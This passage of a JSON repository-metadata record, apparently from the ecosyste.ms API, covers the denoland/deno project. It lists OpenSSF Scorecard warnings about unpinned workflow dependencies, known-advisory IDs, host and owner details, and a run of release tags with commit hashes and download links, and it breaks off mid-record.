https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_a